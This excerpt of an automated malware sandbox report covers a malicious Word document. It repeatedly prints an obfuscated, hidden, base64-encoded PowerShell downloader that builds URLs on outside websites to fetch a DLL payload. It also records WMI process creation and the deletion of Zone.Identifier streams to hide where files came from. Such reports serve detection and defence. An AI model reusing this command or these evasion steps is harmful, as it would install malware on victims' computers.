                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret 7_2_10008098
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret 7_2_10004AED

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wcuhm\nost.bdw:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Afhsry\advki.tth:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
